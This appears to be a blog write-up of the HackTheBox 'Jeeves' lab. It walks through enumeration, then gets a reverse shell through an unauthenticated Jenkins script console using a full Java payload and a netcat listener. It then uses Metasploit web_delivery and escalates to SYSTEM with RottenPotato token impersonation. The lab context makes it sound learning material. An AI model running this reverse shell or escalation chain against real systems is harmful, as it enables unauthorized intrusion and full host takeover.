[hackthebox]Jeeves

jeeves

Introduction

Jeeves is a machine that is rated easy, this machine is hacked through exploiting unauthenticated jeeves dashboard usage. A java reverse shell is executed in Jeeves’ console script (where groovy script can be run for troubleshooting) is run and a reverse connection is connected back to my netcat server.

Once the reverse connection is established, I moved to the user’s desktop to get my user flag.

Checking on the user’s privilege there is a SeImpersonatePrivilege which is a condition to run rottenpotato to elevate to “NT Authority\System”

The next is privilege escalation with rottenpotato, rottenpotato works with incognito which is easily loaded if the shell is a meterpreter, the video on how to do the rottenpotato attack can be found here.

After the root flag is obtained, the last thing is to exit meterpreter and do a clean up with another connection by deleting the uploaded rottenpotato, to delete it has to be kill forcefull with taskkill /PID <pid of rottenpotato.

nmap

nmap -A -p- -oN jeeves -vvv 10.10.10.63

Increasing send delay for 10.10.10.63 from 0 to 5 due to 61 out of 202 dropped probes since last increase.
Nmap scan report for 10.10.10.63
Host is up, received syn-ack (0.17s latency).
Scanned at 2020-05-02 21:58:07 +08 for 595s
Not shown: 65531 filtered ports
Reason: 65531 no-responses
PORT      STATE SERVICE      REASON  VERSION
80/tcp    open  http         syn-ack Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        syn-ack Microsoft Windows RPC
445/tcp   open  microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         syn-ack Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 5h03m13s, deviation: 0s, median: 5h03m13s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 55172/tcp): CLEAN (Timeout)
|   Check 2 (port 48223/tcp): CLEAN (Timeout)
|   Check 3 (port 55682/udp): CLEAN (Timeout)
|   Check 4 (port 48293/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-05-02T19:10:36
|_  start_date: 2020-05-02T18:53:29

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat May  2 22:08:02 2020 -- 1 IP address (1 host up) scanned in 595.85 seconds

Directory enumeration with gobuster on port 50000

gobuster dir -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 -o web_enum

The result is /askjeeves (Status: 302)

Check the 10.10.10.63:50000/askjeeves

jeeves2

Clicking on “Manage Jenkins” I found “Script Console”.
jeeves3

Reverse shell connection

I borrowed the java reverse shell from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#java and did changes on port and ip address.

String host="10.10.14.25";
int port=1337;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

jeeves4

Then before I run the script on Jeeves script console I set up a nc service nc -lvnp 1337

jeeves5

Get the user flag

jeeves6

User’s privilege

jeeves7
the user has a SeImpersonatePrivilege which can be exploited by rottenpotato.exe.

Get meterpreter connection

I would need incognito to execute the rottenpotato in the background, the easiest around would be to load incognito from meterpreter.

To get a meterpreter I would be using exploit/multi/script/web_delivery to deliver the stagers over to Jeeves.

jeeves8

I used these settings for my exploit, target 2 is to specify that it is powershell, the default payload is a python script, hence after setting to target 2 I will have to change the payload to payload/windows/meterpreter/reverse_tcp, which is compatible with powershell.
jeeves9

The Jeeves machine runs a Windows 10 Pro, 64-bit, but I could not get the x64 reverse tcp delivered, the good old payload/windows/meterpreter/reverse_tcp was delivered.

jeeves10

I will copy and paste the powershell payload over to the nc session.
jeeves11

jeeves12

Privilege escalation

I have already downloaded the rottenpotato, I will upload the rottenpotato over to Jeeves, I have also loaded incognito, both load incognito and use incognito works.
jeeves13

By calling help, these are the incognito commands:
jeeves14

the current user has no tokens to impersonate, but after rottenpotato is executed the “NT Authority\System” will be available for impersonation.
jeeves15

The available options for execute are as follows:
jeeves16

execute -Hc -f /users/kohsuke/downloads/rottenpotato.exe, this will execute the rottenpotato in the background and create a channel for interacting with incognito.
jeeves17

Run list_tokens -u I will have available token to impersonate.
jeeves18

Run the incognito command: impersonate_token "NT AUTHORITY\SYSTEM".
jeeves19

There is a small twist, the hm.txt does not directly reveal the root flag.
jeeves20

I create a shell from meterpreter to execute dir /R this will reveal if any files have alternate stream.
jeeves21

read the alternate stream content: more < hm.txt:root.txt
jeeves22

Clean up

When I used tasklist /svc the rottenpotato was not displayed which is intended due to the execute -H option.
jeeves23

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s